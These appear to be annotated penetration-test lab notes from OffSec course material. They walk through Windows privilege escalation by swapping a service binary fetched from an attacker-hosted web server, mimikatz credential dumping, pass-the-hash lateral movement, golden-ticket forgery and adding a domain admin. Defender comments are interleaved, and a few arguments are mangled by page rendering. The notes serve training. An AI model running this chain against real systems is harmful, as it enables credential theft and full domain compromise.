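# Windows pentest lab notes (OffSec course material). The lines mix several
# syntaxes: Kali shell, PowerShell, cmd.exe and the interactive mimikatz
# prompt ("mimikatz # ..." lines are prompt transcripts, not shell comments).
# The file is not runnable as one script; each step is pasted into the
# matching shell. Addresses, hashes and the SID are the lab values from the
# original notes; "192.168.x.xx" is a placeholder left by the author.
# RDP connections
xfreerdp /u:username /p:password /d:domain-name /v:IP-address /w:1920 /h:1080 /fonts /smart-sizing
# Initial enum commands
hostname
whoami
whoami /groups
net user
# Enumeration running services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'}
# Service binary enumeration
# icacls lists the ACL on each service executable, i.e. who may overwrite it.
# A service binary that non-admins can write is the weakness the next steps
# use; the mitigation is to restrict write access on service directories to
# administrators. (second line was misspelled "icalcs" in the original notes)
icacls "C:\xampp\apache\bin\httpd.exe"
icacls "C:\xampp\mysql\bin\mysqld.exe"
# Enumerate specific service
# StartMode tells whether the service comes back on its own after a reboot.
Get-CimInstance -ClassName Win32_Service -Filter "Name='mysql'" | Select-Object StartMode
# Compile adduser.c and configure web server
# Cross-compiled on the attacking box; adduser.c is not part of these notes.
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
python3 -m http.server 80
# Download binary, move it, verify user
# The service executable is backed up and replaced; "net user" afterwards is
# the check that the swapped binary has run (it presumably creates a user).
# Detection: a changed hash on a service binary and a new local account.
iwr -uri http://192.168.x.xx/adduser.exe -OutFile adduser.exe
move C:\xampp\mysql\bin\mysqld.exe mysqld_backup.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
net user
# Restarting service
# "net stop" fails for this account (author's note), so the service is
# restarted by rebooting; -WhatIf / "whoami /priv" first checks that a
# reboot is permitted before actually doing it.
net stop mysql (fails)
Get-CimInstance -ClassName Win32_Service -Filter "Name='mysql'" | Select-Object StartMode
Restart-Computer -WhatIf (or whoami /priv)
Restart-Computer
# Download Mimikatz, dump credentials
# privilege::debug and token::elevate are needed before reading LSASS.
# Mitigation on the defender side: LSA protection / Credential Guard limit
# what sekurlsa::logonpasswords can recover.
iwr -uri http://192.168.1.47/mimikatz.exe -OutFile mimikatz.exe
mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
# Lateral movement 1
# Pass-the-hash with impacket; "-hashes :NTLM" takes an empty LM part.
# The "corp/[email protected]" target is mangled by the page's e-mail
# obfuscation; the original user@host is not recoverable from this copy.
/usr/bin/impacket-wmiexec -hashes :a57b67b0bfe5dbd258226194f0caf201 corp/[email protected]
# Find PS History
# Prompt transcript: the command is "type ConsoleHost_History.txt" run from
# that user's PSReadLine directory.
C:\users\jeff\appdata\roaming\microsoft\windows\powershell\psreadline>type ConsoleHost_History.txt
# PsExec to DC
PsExec64.exe \\dc01 cmd.exe
# Golden ticket information - Dump SID and KRBTGT hash (on DC)
# lsadump::lsa /patch runs on the DC itself; the krbtgt hash it returns is
# what the forged ticket below is signed with.
PS C:\pentst> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate (DONT NEED THIS)
mimikatz # lsadump::lsa /patch
# Create golden ticket (write to file in this case)
# kerberos::purge clears cached tickets first; /ticket:golden writes the
# forged TGT to a file instead of injecting it.
# NOTE(review): "/domain:http://corp.com" looks like a link-rendering
# artifact of the page; the realm argument is normally the bare domain name
# (corp.com) - confirm against the original notes.
PS C:\Tools> .\mimikatz.exe
mimikatz # kerberos::purge
mimikatz # kerberos::golden /user:michael /domain:http://corp.com /sid:S-1-5-21-424464709-3473652527-2093888899 /krbtgt:4199649f577fc4f18891600906044e88 /ticket:golden
# Super golden ticket
# /endin:2147483647 sets the maximum ticket lifetime (minutes). Defender
# note: a TGT whose lifetime far exceeds the domain policy is a strong
# detection signal, and resetting the krbtgt password twice invalidates
# every ticket forged with the old hash.
kerberos::golden /user:michael /domain:http://corp.com /sid:S-1-5-21-424464709-3473652527-2093888899 /krbtgt:4199649f577fc4f18891600906044e88 /ticket:corp_super_golden /endin:2147483647
# Inject ticket to memory
# kerberos::ptt loads the ticket file written above into the current session.
C:\Tools> mimikatz.exe
mimikatz # kerberos::ptt golden
# PsExec to DC
PsExec64.exe \\dc01 cmd.exe
# Verify groups
whoami /groups
# Adding a domain admin
# Both steps generate account-creation and group-change events on the DC,
# which is what a defender would alert on here.
net user mighty Password123! /add /domain
net group "domain admins" mighty /add /domain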